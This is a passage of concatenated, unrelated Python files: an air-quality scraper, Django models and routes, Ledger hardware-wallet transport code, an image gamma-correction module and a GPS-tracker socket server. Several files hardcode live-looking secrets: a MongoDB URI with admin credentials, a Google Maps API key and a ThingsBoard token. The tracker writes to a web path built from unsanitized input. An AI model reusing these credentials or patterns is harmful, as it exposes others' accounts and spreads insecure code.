        'shatin': 8, '': 9, 'taipo': 10, 'tapmun': 11, 'tseungkwano': 12,
        'tsuenwan': 13, 'tuenmun': 14, 'tungchung': 15, 'yuenlong': 16,
    }
    key = location.replace(' ', '').casefold()
    return codes.get(key, 17)
@sched.scheduled_job('interval', minutes=30)
def job1():
    """Scrape each station's past-24h pollutant-concentration table and insert
    any rows not already stored into MongoDB (fyp.airPollution).

    Runs every 30 minutes; rows are keyed by (dateTime, locationCode).
    """
    print("%s: job" % time.asctime())
    web = ['http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration45fd.html?stationid=80',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentratione1a6.html?stationid=73',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationfb71.html?stationid=74',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationdb46.html?stationid=66',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration30e8.html?stationid=72',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration228e.html?stationid=77',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration0b35.html?stationid=83',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration1f2c.html?stationid=70',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration537c.html?stationid=82',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationf322.html?stationid=78',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration6e9c.html?stationid=69',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration2c5f.html?stationid=75',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration233a.html?stationid=76',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration5ca5.html?stationid=71',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationf9dd.html?stationid=79',
           'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration9c57.html?stationid=81']
    location = ['Central/western', 'Eastern', 'Kwun Tong', 'Sham Shui Po',
                'Kwai Chung', 'Tsuen Wan', 'Tseung Kwan O', 'Yuen Long',
                'Tuen Mun', 'Tung Chung', 'Tai Po', 'Sha Tin',
                'Tap Mun', 'Causeway Bay', 'Central', 'Mong Kok']
    # One shared client/collection (previously re-created for every station).
    # NOTE(review): credentials are hardcoded in the URI -- move to config.
    client = MongoClient('mongodb://admin:admin@cluster0-shard-00-00-9eks9.mongodb.net:27017,cluster0-shard-00-01-9eks9.mongodb.net:27017,cluster0-shard-00-02-9eks9.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true')
    collection = client['fyp'].airPollution
    for url, loc in zip(web, location):
        # Fetch once. The original issued a second, redundant requests.get()
        # to md5-hash the page for an unfinished change-check (`if False:`)
        # that never fired; that dead branch is removed.
        res = requests.get(url)
        sp = BeautifulSoup(res.text, 'html.parser')
        stamps = sp.find_all('td', {'class': 'H24C_ColDateTime'})
        readings = sp.find_all('td', {'class': 'H24C_ColItem'})
        dateTime = [re.sub('\xa0', ' ', str(dt.text)) for dt in stamps]
        # Six pollutant columns per timestamp row.
        values = np.array([str(dt.text) for dt in readings]).reshape(int(len(readings) / 6), 6)
        df1 = pd.DataFrame(values, columns=['NO2', 'O3', 'SO2', 'CO', 'PM10', 'PM2.5'])
        df1['dateTime'] = dateTime
        df1['location'] = loc
        df1 = df1.rename(columns={'PM2.5': 'PM25'})
        for row in range(0, len(df1)):
            doc = {'dateTime': parse(df1['dateTime'][row]),
                   'location': df1['location'][row],
                   'locationCode': getLocationCode(df1['location'][row]),
                   'NO2': df1['NO2'][row],
                   'O3': df1['O3'][row],
                   'SO2': df1['SO2'][row],
                   'CO': df1['CO'][row],
                   'PM10': df1['PM10'][row],
                   'PM25': df1['PM25'][row]
                   }
            # Insert only when this (dateTime, locationCode) pair is new.
            query = {'dateTime': doc['dateTime'], 'locationCode': doc['locationCode']}
            if (collection.find(query).count() == 0):
                collection.insert_one(doc)
@sched.scheduled_job('interval', minutes=30)
def job2():
    """Fetch the current AQHI RSS feed and insert new per-station readings
    into MongoDB (fyp.currentAQHI), keyed by (time, locationCode)."""
    # Fetch once. The original fetched the feed a second time only to md5-hash
    # it for an unfinished change-check (`if False:`) that never fired.
    res = requests.get('http://www.aqhi.gov.hk/epd/ddata/html/out/aqhi_ind_rss_Eng.xml')
    soup = bs4.BeautifulSoup(res.text, 'lxml')
    aqhi = soup.select('title')
    location = soup.select('pubdate')
    # One shared connection (previously re-created on every loop iteration).
    # NOTE(review): credentials are hardcoded in the URI -- move to config.
    conn = MongoClient('mongodb://admin:admin@cluster0-shard-00-00-9eks9.mongodb.net:27017,cluster0-shard-00-01-9eks9.mongodb.net:27017,cluster0-shard-00-02-9eks9.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true')
    collection = conn.fyp.currentAQHI
    # The first two <title> entries are feed metadata; stations follow,
    # formatted as "<station> : <aqhi>".
    for x in range(2, len(aqhi)):
        y = [int(s) for s in aqhi[x].getText().split() if s.isdigit()]
        emp_rec = {
            "time": parse(location[0].getText().split(' +0800')[0].split(',')[1]),
            "location": aqhi[x].getText().split(':')[0],
            "aqhi": aqhi[x].getText().split(':')[1],
            "locationCode": getLocationCode(aqhi[x].getText().split(':')[0])
        }
        print(location[0].getText())
        print(y)
        print(aqhi[x].getText())
        # Insert only when this (time, locationCode) pair is new.
        query = {'time': emp_rec["time"], 'locationCode': emp_rec["locationCode"]}
        if (collection.find(query).count() == 0):
            collection.insert_one(emp_rec)
        # Echo everything stored so far (debug output kept from the original).
        cursor = collection.find()
        for record in cursor:
            print(record)
# Run both scrape jobs once at startup, then hand control to the blocking
# scheduler, which re-runs them every 30 minutes.
job1()
job2()
sched.start()
# scheduler.add_job(job1, 'interval', minutes=30 )
# scheduler.add_job(job2, 'interval', minutes=30 )
# scheduler.start()
from django.db import models
from django.contrib.auth.models import User
# Choices for History.category as (stored value, human-readable label) pairs.
# NOTE(review): the Japanese string is the value persisted to the DB and the
# English string the display label -- confirm that ordering is intended.
Category = [
    ('データサイエンス', 'DataScience'),
    ('機械学習', 'Machine Learning'),
    ('ディープラーニング', 'Deep Learning'),
    ('データ分析', 'Data Analysis'),
    ('Python 基礎', 'Python Basic'),
    ('Django', 'Django'),
    ('環境構築', 'environ_set'),
    ('その他', 'etc')
]
class History(models.Model):
    """A learning-history article: title, summary, and up to five
    subtitle/content sections, with an optional image, a category,
    an author, and created/updated timestamps."""
    title = models.CharField(max_length=100)
    summary = models.TextField(max_length=500)
    # Up to five optional (subtitle, content) sections; only the first
    # subtitle is required. NOTE(review): field names are not PEP 8, but
    # renaming would require a DB migration.
    ContentSubtitle1 = models.CharField(max_length=100)
    Content1 = models.TextField(max_length=500, blank=True, null=True)
    ContentSubtitle2 = models.CharField(max_length=100, blank=True, null=True)
    Content2 = models.TextField(max_length=500, blank=True, null=True)
    ContentSubtitle3 = models.CharField(max_length=100, blank=True, null=True)
    Content3 = models.TextField(max_length=500, blank=True, null=True)
    ContentSubtitle4 = models.CharField(max_length=100, blank=True, null=True)
    Content4 = models.TextField(max_length=500, blank=True, null=True)
    ContentSubtitle5 = models.CharField(max_length=100, blank=True, null=True)
    Content5 = models.TextField(max_length=500, blank=True, null=True)
    images = models.ImageField(upload_to='images/', blank=True, null=True)
    category = models.CharField(max_length=30, choices=Category)
    # Deleting the author removes their articles.
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return self.title
|
from django.urls import path
import cart.views
# Cart routes; <kimchi_id> is passed to each view as a string kwarg.
urlpatterns = [
    path('add/<kimchi_id>', cart.views.add_to_cart, name="add_to_cart_route"),
    path('view/', cart.views.view_cart, name="view_cart_route"),
    path('remove/<kimchi_id>', cart.views.remove_from_cart,
         name="remove_from_cart_route"),
    path('update_quantity/<kimchi_id>', cart.views.update_quantity,
         name="update_quantity_route")
]
|
"""
*******************************************************************************
* Ledger Blue
* (c) 2016 Ledger
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
********************************************************************************
"""
from binascii import hexlify
import hid
import os
import time
import sys
import nfc
from nfc.clf import RemoteTarget
from .commException import CommException
from .commHTTP import getDongle as getDongleHTTP
from .commTCP import getDongle as getDongleTCP
from .commU2F import getDongle as getDongleU2F
from .Dongle import Dongle, DongleWait, TIMEOUT
from .ledgerWrapper import wrapCommandAPDU, unwrapResponseAPDU
from .BleComm import BleDevice
# Transport selection via environment variables; getDongle() checks these
# in order (APDUGEN, U2F, MCU proxy, TCP proxy, NFC, BLE, HID, PCSC).
APDUGEN=None
if "APDUGEN" in os.environ and len(os.environ["APDUGEN"]) != 0:
    APDUGEN=os.environ["APDUGEN"]
# Force use of U2F if required
U2FKEY=None
if "U2FKEY" in os.environ and len(os.environ["U2FKEY"]) != 0:
    U2FKEY=os.environ["U2FKEY"]
# Force use of MCUPROXY if required
MCUPROXY=None
if "MCUPROXY" in os.environ and len(os.environ["MCUPROXY"]) != 0:
    MCUPROXY=os.environ["MCUPROXY"]
# Force use of TCP PROXY if required
TCP_PROXY=None
if "LEDGER_PROXY_ADDRESS" in os.environ and len(os.environ["LEDGER_PROXY_ADDRESS"]) != 0 and \
   "LEDGER_PROXY_PORT" in os.environ and len(os.environ["LEDGER_PROXY_PORT"]) != 0:
    TCP_PROXY=(os.environ["LEDGER_PROXY_ADDRESS"], int(os.environ["LEDGER_PROXY_PORT"]))
# Force use of NFC if required (presence of the variable is enough)
NFC_PROXY=None
if "LEDGER_NFC_PROXY" in os.environ:
    NFC_PROXY=True
# Force use of BLE if required (presence of the variable is enough)
BLE_PROXY=None
if "LEDGER_BLE_PROXY" in os.environ:
    BLE_PROXY=True
# Force use of PCSC if required (the original comment wrongly said MCUPROXY)
PCSC=None
if "PCSC" in os.environ and len(os.environ["PCSC"]) != 0:
    PCSC=os.environ["PCSC"]
if PCSC:
    # pyscard is optional; silently fall back when it is not installed.
    try:
        from smartcard.Exceptions import NoCardException
        from smartcard.System import readers
        from smartcard.util import toHexString, toBytes
    except ImportError:
        PCSC = False
class HIDDongleHIDAPI(Dongle, DongleWait):
    """Dongle transport over raw USB HID (hidapi) using 64-byte reports.

    With ledger=True, APDUs are wrapped/unwrapped in the Ledger HID framing
    (channel 0x0101); otherwise a legacy 61xx continuation protocol is used.
    """

    def __init__(self, device, ledger=False, debug=False):
        self.device = device
        self.ledger = ledger
        self.debug = debug
        self.waitImpl = self
        self.opened = True

    def exchange(self, apdu, timeout=TIMEOUT):
        """Send one APDU, block for the reply, and return the response data.

        Raises CommException on any status word other than 0x9000 / 0x61xx /
        0x6Cxx, with a best-guess cause for the common Ledger error codes.
        """
        if APDUGEN:
            # APDU-generation mode: dump the hex instead of talking to a device.
            print(apdu.hex())
            return b""
        if self.debug:
            print("HID => %s" % apdu.hex())
        if self.ledger:
            apdu = wrapCommandAPDU(0x0101, apdu, 64)
        # Zero-pad to a whole number of 64-byte reports.
        padSize = len(apdu) % 64
        tmp = apdu
        if padSize != 0:
            tmp.extend([0] * (64 - padSize))
        # Write one report at a time; the leading 0x00 is the HID report id.
        offset = 0
        while offset != len(tmp):
            data = tmp[offset:offset + 64]
            data = bytearray([0]) + data
            if self.device.write(data) < 0:
                raise BaseException("Error while writing")
            offset += 64
        dataLength = 0
        dataStart = 2
        result = self.waitImpl.waitFirstResponse(timeout)
        if not self.ledger:
            # Legacy protocol: a 61xx first byte means xx more data bytes follow.
            if result[0] == 0x61: # 61xx : data available
                self.device.set_nonblocking(False)
                dataLength = result[1]
                dataLength += 2
                if dataLength > 62:
                    # Pull additional 64-byte reports until all data is read.
                    remaining = dataLength - 62
                    while remaining != 0:
                        if remaining > 64:
                            blockLength = 64
                        else:
                            blockLength = remaining
                        result.extend(bytearray(self.device.read(65))[0:blockLength])
                        remaining -= blockLength
                swOffset = dataLength
                dataLength -= 2
                self.device.set_nonblocking(True)
            else:
                swOffset = 0
        else:
            # Ledger framing: keep reading reports until a full wrapped
            # response can be reassembled.
            self.device.set_nonblocking(False)
            while True:
                response = unwrapResponseAPDU(0x0101, result, 64)
                if response is not None:
                    result = response
                    dataStart = 0
                    swOffset = len(response) - 2
                    dataLength = len(response) - 2
                    self.device.set_nonblocking(True)
                    break
                result.extend(bytearray(self.device.read(65)))
        # Last two bytes are the ISO 7816 status word.
        sw = (result[swOffset] << 8) + result[swOffset + 1]
        response = result[dataStart : dataLength + dataStart]
        if self.debug:
            print("HID <= %s%.2x" % (response.hex(), sw))
        if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
            possibleCause = "Unknown reason"
            if sw == 0x6982:
                possibleCause = "Have you uninstalled the existing CA with resetCustomCA first?"
            if sw == 0x6985:
                possibleCause = "Condition of use not satisfied (denied by the user?)"
            if sw == 0x6a84 or sw == 0x6a85:
                possibleCause = "Not enough space?"
            if sw == 0x6a83:
                possibleCause = "Maybe this app requires a library to be installed first?"
            if sw == 0x6484:
                possibleCause = "Are you using the correct targetId?"
            if sw == 0x6d00:
                possibleCause = "Unexpected state of device: verify that the right application is opened?"
            if sw == 0x6e00:
                possibleCause = "Unexpected state of device: verify that the right application is opened?"
            raise CommException("Invalid status %04x (%s)" % (sw, possibleCause), sw, response)
        return response

    def waitFirstResponse(self, timeout):
        """Poll the (non-blocking) device until the first report arrives,
        raising CommException("Timeout") after `timeout` seconds."""
        start = time.time()
        data = ""
        while len(data) == 0:
            data = self.device.read(65)
            if not len(data):
                if time.time() - start > timeout:
                    raise CommException("Timeout")
                time.sleep(0.0001)
        return bytearray(data)

    def apduMaxDataSize(self):
        # Maximum APDU data field length.
        return 255

    def close(self):
        # Idempotent; ignores errors from an already-broken handle.
        if self.opened:
            try:
                self.device.close()
            except:
                pass
        self.opened = False
from nfc.tag.tt4 import Type4TagCommandError
# APDU header bytes for the NFC write/read tunnelling commands used by DongleNFC.
NFC_CLA = 0x00
NFC_INS_WRITE = 0x5e
NFC_INS_READ = 0x5f
NFC_P1 = 0x00
NFC_P2 = 0x00
# Dump the raw tunnelled APDUs when True.
DEBUG_NFC_APDU = False
class DongleNFC(Dongle, DongleWait):
    """Dongle transport tunnelled over an NFC Type-4 tag (nfcpy)."""

    def __init__(self, debug=False):
        self.waitImpl = self
        self.opened = True
        self.debug = debug
        self.clf = nfc.ContactlessFrontend('usb')
        # on-connect returning False hands control back here immediately.
        self.tag = self.clf.connect(rdwr={'on-connect': lambda tag: False})
        print(self.tag)
        if self.tag.ndef is not None:
            for record in self.tag.ndef.records:
                print(record)

    def _exchange_write(self, apdu, timeout=TIMEOUT):
        """Send the command APDU, retrying up to 3 times on tag command errors."""
        success = False
        nb_ex = 0
        while success is False:
            try:
                if DEBUG_NFC_APDU:
                    debug = bytearray([NFC_CLA, NFC_INS_WRITE, NFC_P1, NFC_P2, len(apdu)]) + apdu
                    print(debug.hex())
                response = self.tag.send_apdu(NFC_CLA, NFC_INS_WRITE, NFC_P1, NFC_P2, apdu, check_status=False)
                if DEBUG_NFC_APDU:
                    print(response.hex())
                sw = (response[-2] << 8) + response[-1]
                if (sw & 0xF000) != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
                    raise BaseException("Invalid status word received: " + hex(sw))
            except Type4TagCommandError as ex:
                if (nb_ex > 2):
                    raise ex
                time.sleep(0.1)
                nb_ex = nb_ex + 1
                continue
            success = True
        return response

    def _exchange_read(self, timeout=TIMEOUT):
        """Poll for the response while the device reports 0x6100 (not ready)."""
        sw = 0x6100
        nb_ex = 0
        while sw == 0x6100:
            try:
                if DEBUG_NFC_APDU:
                    debug = bytearray([NFC_CLA, NFC_INS_READ, NFC_P1, NFC_P2])
                    print(debug.hex())
                response = self.tag.send_apdu(NFC_CLA, NFC_INS_READ, NFC_P1, NFC_P2, None, check_status=False)
                if DEBUG_NFC_APDU:
                    print(response.hex())
                sw = (response[-2] << 8) + response[-1]
                if (sw & 0xF000) != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
                    raise BaseException("Invalid status word received: " + hex(sw))
            except Type4TagCommandError as ex:
                if (nb_ex > 2):
                    raise ex
                time.sleep(0.1)
                nb_ex = nb_ex + 1
            time.sleep(0.001)
        return response

    def exchange(self, apdu, timeout=TIMEOUT):
        if self.debug:
            print(f"[NFC] => {apdu.hex()}")
        response = self._exchange_write(apdu, timeout)
        sw = (response[-2] << 8) + response[-1]
        # BUG FIX: the original compared the bytearray `response` to the int
        # 0x9000 (always unequal), forcing a read after every write.
        # Compare the status word instead: only poll for the response when
        # the write did not already complete with 0x9000.
        if sw != 0x9000:
            response = self._exchange_read(timeout)
        if self.debug:
            print(f"[NFC] <= {response.hex()}")
        return response

    def apduMaxDataSize(self):
        # Maximum APDU data field length.
        return 255

    def close(self):
        pass
class DongleBLE(Dongle, DongleWait):
    """Dongle transport over Bluetooth Low Energy (BleDevice).

    The target MAC address is read from the LEDGER_BLE_MAC environment
    variable; run `python -m ledgerblue.BleComm` to pick a device.
    """

    def __init__(self, debug=False):
        self.waitImpl = self
        self.debug = debug
        try:
            self.device = BleDevice(os.environ['LEDGER_BLE_MAC'])
            self.device.open()
        except KeyError as ex:
            # Typo fix in the user-facing message: "wich" -> "which".
            sys.exit(f"Key Error\nPlease run 'python -m ledgerblue.BleComm' to select which device to connect to")
        self.opened = self.device.opened

    def exchange(self, apdu, timeout=TIMEOUT):
        """Send an APDU and return the response data (status word stripped).

        On any status word other than 0x9000 / 0x61xx / 0x6Cxx the device is
        closed and CommException raised with a best-guess cause.
        """
        if self.debug:
            print(f"[BLE] => {apdu.hex()}")
        response = self.device.exchange(apdu, timeout)
        # Last two bytes are the ISO 7816 status word.
        sw = (response[-2] << 8) + response[-1]
        response = response[0:-2]
        if self.debug:
            print("[BLE] <= %s%.2x" % (response.hex(), sw))
        if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
            possibleCause = "Unknown reason"
            if sw == 0x6982:
                possibleCause = "Have you uninstalled the existing CA with resetCustomCA first?"
            if sw == 0x6985:
                possibleCause = "Condition of use not satisfied (denied by the user?)"
            if sw == 0x6a84 or sw == 0x6a85:
                possibleCause = "Not enough space?"
            if sw == 0x6a83:
                possibleCause = "Maybe this app requires a library to be installed first?"
            if sw == 0x6484:
                possibleCause = "Are you using the correct targetId?"
            if sw == 0x6d00:
                possibleCause = "Unexpected state of device: verify that the right application is opened?"
            if sw == 0x6e00:
                possibleCause = "Unexpected state of device: verify that the right application is opened?"
            self.close()
            raise CommException("Invalid status %04x (%s)" % (sw, possibleCause), sw, response)
        return response

    def apduMaxDataSize(self):
        # Smaller than HID due to the BLE transport framing.
        return 0x99

    def close(self):
        self.device.close()
class DongleSmartcard(Dongle):
    """Dongle transport over a PC/SC smartcard reader connection (pyscard)."""

    def __init__(self, device, debug=False):
        self.device = device
        self.debug = debug
        self.waitImpl = self
        self.opened = True

    def exchange(self, apdu, timeout=TIMEOUT):
        """Transmit an APDU; raises CommException on any status word other
        than 0x9000 / 0x61xx / 0x6Cxx. Returns the response as a bytearray."""
        if self.debug:
            print("SC => %s" % apdu.hex())
        # NOTE(review): hexlify() returns bytes on Python 3 while
        # smartcard.util.toBytes expects a hex string -- confirm on target.
        response, sw1, sw2 = self.device.transmit(toBytes(hexlify(apdu)))
        sw = (sw1 << 8) | sw2
        if self.debug:
            # BUG FIX: transmit() returns a list of ints, which has no .hex();
            # the original debug print raised AttributeError.
            print("SC <= %s%.2x" % (bytearray(response).hex(), sw))
        if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
            raise CommException("Invalid status %04x" % sw, sw, bytearray(response))
        return bytearray(response)

    def close(self):
        # Idempotent; ignores errors from an already-broken connection.
        if self.opened:
            try:
                self.device.disconnect()
            except:
                pass
        self.opened = False
def getDongle(debug=False, selectCommand=None):
    """Open and return the first available Dongle transport.

    Priority order (driven by the module-level env-var flags): APDU
    generation, U2F, MCU HTTP proxy, TCP proxy, NFC, BLE, then USB HID
    (Ledger vendor id 0x2c97), and finally PC/SC readers.

    Args:
        debug: dump APDUs on the chosen transport.
        selectCommand: when truthy, PC/SC readers are probed by sending a
            SELECT for the Ledger wallet applet and keeping the first reader
            that answers 0x9000.

    Raises:
        CommException: when no transport can be opened.
    """
    if APDUGEN:
        return HIDDongleHIDAPI(None, True, debug)
    if not U2FKEY is None:
        return getDongleU2F(scrambleKey=U2FKEY, debug=debug)
    elif MCUPROXY is not None:
        return getDongleHTTP(remote_host=MCUPROXY, debug=debug)
    elif TCP_PROXY is not None:
        return getDongleTCP(server=TCP_PROXY[0], port=TCP_PROXY[1], debug=debug)
    elif NFC_PROXY:
        return DongleNFC(debug)
    elif BLE_PROXY:
        return DongleBLE(debug)
    dev = None
    hidDevicePath = None
    ledger = True
    # Keep the last matching HID interface (interface 0 or usage page 0xffa0).
    for hidDevice in hid.enumerate(0, 0):
        if hidDevice['vendor_id'] == 0x2c97:
            if ('interface_number' in hidDevice and hidDevice['interface_number'] == 0) or ('usage_page' in hidDevice and hidDevice['usage_page'] == 0xffa0):
                hidDevicePath = hidDevice['path']
    if hidDevicePath is not None:
        dev = hid.device()
        dev.open_path(hidDevicePath)
        dev.set_nonblocking(True)
        return HIDDongleHIDAPI(dev, ledger, debug)
    if PCSC:
        connection = None
        for reader in readers():
            try:
                connection = reader.createConnection()
                connection.connect()
                if selectCommand != None:
                    # Probe with a SELECT of the Ledger wallet applet AID.
                    response, sw1, sw2 = connection.transmit(toBytes("00A4040010FF4C4547522E57414C5430312E493031"))
                    sw = (sw1 << 8) | sw2
                    if sw == 0x9000:
                        break
                    else:
                        connection.disconnect()
                        connection = None
                else:
                    break
            except:
                # Ignore readers without a card / failing connections.
                connection = None
                pass
        if connection is not None:
            return DongleSmartcard(connection, debug)
    raise CommException("No dongle found")
|
'''
This module contains logic of pixel transforation.
which include gamma correction factor calualtion and transformation
logic.
Adaptive gamma correction techinqe
'''
import cv2
import numpy as np
import math
import logging
logger=logging.getLogger(__name__)
def calculate_gamma_factor(image):
    """Compute an adaptive gamma factor for a BGR frame.

    The factor is log(mean V) / log(0.53 * 255), i.e. the exponent that maps
    the frame's mean brightness (HSV value channel) onto a mid-tone target.

    Args:
        image: BGR image (numpy array) as produced by OpenCV.

    Returns:
        float gamma factor; 1.0 (identity) for a degenerate all-black frame,
        where the original code raised ValueError from math.log(0).
    """
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    hue, sat, val = cv2.split(hsv)
    mid = 0.53
    mean = np.mean(val)
    if mean <= 0:
        # log(0) is undefined; treat an all-black frame as needing no change.
        return 1.0
    meanLog = math.log(mean)
    midLog = math.log(mid * 255)
    gamma = meanLog / midLog
    logger.debug("mean: %s, meanlog: %s, midLog: %s, gamma: %s", mean, meanLog, midLog, gamma)
    return gamma
def apply_brightness_adjustment_gamma(image):
    """Adaptive gamma correction for brightness improvement.

    Builds a 256-entry lookup table mapping pixel -> 255*(pixel/255)^gamma
    and applies it with cv2.LUT.

    Args:
        image: BGR image (numpy array).

    Returns:
        Gamma-corrected image of the same shape and dtype.
    """
    gamma = calculate_gamma_factor(image)
    # Vectorized LUT construction; replaces the per-index Python loop and
    # produces the same uint8 truncation as np.clip(pow(...), 0, 255).
    lookUpTable = np.clip(
        np.power(np.arange(256, dtype=np.float64) / 255.0, gamma) * 255.0, 0, 255
    ).astype(np.uint8).reshape(1, 256)
    image_gamma = cv2.LUT(image, lookUpTable)
    return image_gamma
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import sys
import struct
import json
import urllib2
def gmap(x, y, id):
    """Write a Google-Maps HTML page centred on (x, y) to /var/www/html/<id>.html.

    BUG FIX: the template is %-formatted but contained a raw `width:100%;`;
    the lone % before ';' raised ValueError ("unsupported format character"),
    so the page could never be generated. It is now escaped as `%%`.
    The file handle is also closed (previously leaked).
    """
    # NOTE(review): `id` comes straight from device data and is interpolated
    # into a filesystem path unsanitized -- validate before deployment.
    gmap_page = """
<!DOCTYPE html>
<html>
<body>
<h1>Your tracker at Electrodragon.com</h1>
<div id="googleMap" style="width:100%%;height:400px;"></div>
<script>
function myMap() {
var mapProp= {
center:new google.maps.LatLng(%s, %s),
zoom:5,
};
var map=new google.maps.Map(document.getElementById("googleMap"),mapProp);
}
</script>
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDwTjLo9c8HjFhTLyApuFc_8IIehFQDSRg&callback=myMap"></script>
</body>
</html>
""" % (x, y)
    f = open('/var/www/html/%s.html' % id, 'w')
    f.writelines(gmap_page)
    f.close()
# TCP server for GPS trackers: bind on all interfaces, port 8100 (Python 2).
HOST = ''
PORT = 8100
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) ## reuse socket 8100
s.bind((HOST, PORT))
s.listen(5)
print 'Server start at: %s:%s' %(HOST, PORT)
print 'wait for connection...'
def httpsend(x, y):
    """POST the position (x=longitude, y=latitude) as device attributes to
    ThingsBoard over HTTP (Python 2 urllib2).

    NOTE(review): the device access token is hardcoded -- move to config.
    """
    data = {
        "latitude": y,
        "longitude": x,
        "batteryLevel": "0",
        "batteryCharging": "0"
    }
    credential = "qt6GZuEqH685HYzi8OlH"
    addr = "demo.thingsboard.io:80"
    req = urllib2.Request('http://%s/api/v1/%s/attributes' % (addr,credential) )
    req.add_header('Content-Type', 'application/json')
    response = urllib2.urlopen(req, json.dumps(data))
    #print("data uploaded")
def findDATA(DATA):
    """Locate the marker string DATA in the global codec_data hex stream and
    return the two 8-hex-digit words that follow it as a (word1, word2) pair."""
    idx = codec_data.find(DATA)   # marker position in the hex dump
    start = idx + 8               # payload begins after the 8-char marker
    return codec_data[start:start + 8], codec_data[start + 8:start + 16]
def hexDEC(HEXdata):
    """Convert a pair of hex strings to a pair of ints (base 16)."""
    first, second = HEXdata[0], HEXdata[1]
    return int(first, 16), int(second, 16)
def restDATA():
    """Decode date/time, product-ID and user serial-number fields from the
    global codec_data stream; returns the formatted serial number."""
    hex_time = findDATA("00040006") # 12 long
    hex_ID = findDATA("a0950006") # 12 long
    # BUG FIX: this lookup had been accidentally merged into the comment on
    # the line above ("# 12 lonhex_sn = ..."), leaving hex_sn undefined and
    # raising NameError at runtime.
    hex_sn = findDATA("00010006") # 12 long
    hex_sn_format = hex_sn[0]+hex_sn[1][0:4]
    print ("HEX DATE 3L- Y-N-D: %s" % hex_time[0][0:6])
    print ("HEX TIME 3L - H-M-S: %s" % hex_time[0][6:8]+hex_time[1][0:4])
    print ("HEX pro_ID 3L: %s" % hex_ID[0]+hex_ID[1][0:4] )
    print ("HEX user_SN 3L: %s" % hex_sn_format )
    return hex_sn_format
def lbs_data(): # 16 , if find lbs
    """Parse LBS longitude/latitude from the global codec_data stream.

    Returns (lon, lat) in degrees when the 51400008 flag is present, else
    False. Side effect: uploads the position upstream via httpsend().
    """
    if codec_data.find("51400008") != -1:
        DATA = findDATA("51400008") # find flag for lbs data 51400008
        temp_lbs_lon = DATA[1] # longitude X (hex)
        temp_lbs_lat = DATA[0] # latitude Y (hex)
        print ("HEX LBS 2x2L - X-Y: %s, %s" % (temp_lbs_lon, temp_lbs_lat))
        decDATA = hexDEC(DATA)
        # Raw values are degrees * 1e6.
        lbs_lat = decDATA[1]/float(1000000.00)
        lbs_lon = decDATA[0]/float(1000000.00)
        print ("DEC LBS 2x2L - X-Y: %s, %s" % (lbs_lon, lbs_lat))
        httpsend(lbs_lon, lbs_lat)
        return lbs_lon, lbs_lat
    else:
        return False
def allDATA():
    """When LBS data is present in the packet, upload the position and
    regenerate the map page for this tracker's serial number.

    BUG FIX: the original assigned the result to the name `lbs_data` inside
    the function body, making it a local variable and raising
    UnboundLocalError on the preceding `if lbs_data():` call; it also called
    lbs_data() twice, posting the position upstream twice.
    """
    coords = lbs_data()
    if coords:
        rest_data = restDATA()
        # NOTE(review): rest_data is a string, so rest_data[0] is only its
        # first character -- confirm whether the full serial was intended
        # as the page name (behavior kept as-is).
        gmap(coords[0], coords[1], rest_data[0])
# Accept tracker connections forever; each received payload is hex-encoded
# (Python 2: str.encode('hex')) into the global codec_data consumed by
# findDATA()/lbs_data(), then parsed by allDATA().
while True:
    conn, addr = s.accept()
    print 'Connected by ', addr
    while True:
        data = conn.recv(182) #182
        codec_data = data.encode('hex')
        print codec_data
        print ("INFO: star_char-%s, version-%s, action-%s, pack_times-%s" % (codec_data[0:4], codec_data[4:12], codec_data[12:16], codec_data[16:20]) ) # simple print demo
        allDATA()
        conn.send("server received you message.")
|
import wx
from SeChainController.MainController import MainController
from SeChainController import Property
class MainApp(wx.App):
    """wx application bootstrap: builds the MainFrame, shows it, and
    registers it in the shared Property module for console output."""

    def OnInit(self):
        frame = MainFrame()
        # Frame construction is deferred to drow_frame (see MainFrame.__init__).
        frame.drow_frame(None, -1, 'Se-Chain')
        frame.Show(True)
        Property.ui_frame = frame
        self.SetTopWindow(frame)
        return True
class MainFrame(wx.Frame):
